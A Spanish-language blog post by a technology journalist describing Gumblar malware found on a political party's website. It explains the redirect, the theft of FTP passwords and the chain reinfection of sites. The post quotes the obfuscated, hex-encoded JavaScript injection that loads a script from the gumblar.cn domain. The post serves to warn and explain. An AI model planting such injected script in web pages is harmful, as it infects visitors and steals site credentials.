El mail de mi amigo decía “¿podés verificar este website?” y allá fui. Era el site de un partido político de segunda línea. De entrada, el fiel Iceweasel me chilló “esto está lleno de Javascript” así que me puse a leer el código. Y encontré un pasaje interesante: <22`3csc`72ipt`20sr`63`3d`2f`2fgumblar`2e`63`6e`2f`72`73s`2f`3f`69`64`3d`22+j+`22`3> que no es lo que parece. Nunca hay que bajar la guardia. Y si se administra un website, es peor


Ahí dice, para quien tenga la paciencia de pasar de hexadecimal a letras y números, varias cosas además de <http://www.g*m*lar.cn/rss/?id=“+j+”> y ni corto ni perezoso me fui para allí. El website chino (eso es “cn”) intentó bajar alegremente algo a mi máquina. En el caso de un visitante menos paranoico que yo, lo que se produce es una redirección automática: vos entraste a un website inocente pero parasitado, en tu browser se cargó este trocito de código, tu browser se fue al otro website, y algunos archivos bajaron a tu máquina. Troyanos que buscan contraseñas, especialmente de FTP. Le avisé a mi amigo, él avisó al webmaster. Desinfectaron, espero. Algunos antivirus detectan el malware al toque, el que usa mi amigo, no. Si navegás con Firefox, antes de ingresar te sale tremendo cartel marcando que es un website peligroso. Internet Explorer… no sé. No uso. Si mi amigo hubiese navegado con Javascript deshabilitado, la máquina no se infecta.
Volvamos al robo de contraseñas FTP. Si vos no tenés un website, no sabés qué grave es esto. Por medio de programas FTP es que se sube contenido al sitio web. Si una contraseña de un website llega a manos de un extraño, es como si el tipo hubiese obtenido la llave de tu casa ¿queda claro?
El sistema de trabajo de Tian Kai Cui, el que registró el website Gumblar, es muy interesante, casi de robo en cadena. Mete código dañino en una página web, casi siempre (pero no exclusivamente) hecha en PHP. Docenas de visitantes incautos lo visitan, y sus máquinas son velozmente parasitadas y revisadas. Las contraseñas son enviadas al jefe por email. En el servidor del atacante (que es otro distinto) un programa revisa rápidamente las contraseñas capturadas para ver cuáles permiten el ingreso a websites. Otro programa ingresa a los sitios (usando la contraseña del dueño, así que no despiertan sospechas) y copia allí el código de ataque. Más personas visitan las docenas de sitios infectados, y a su vez más contraseñas son robadas y enviadas al Comando Central.
El motivo es simple: la codicia. Quienes están detrás de esto venden bots, esos grupos de máquinas esclavas que se emplean para enviar spam. De paso, si cuadra, también habrán conseguido algunos miles de números de tarjeta de crédito o cuentas bancarias.
El website <gumblar> ya fue desactivado, pero al toque ha surgido otro y el mecanismo es el mismo. Debe ser por eso que la carita sarcástica de Tian Kai Cui se sigue riendo de nosotros desde su ASCII. ¿No te diste cuenta? Está dentro del código de su Javascript: +j+

Por Ricardog

Periodista científico especializado en tecnología. Médico en retiro efectivo.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.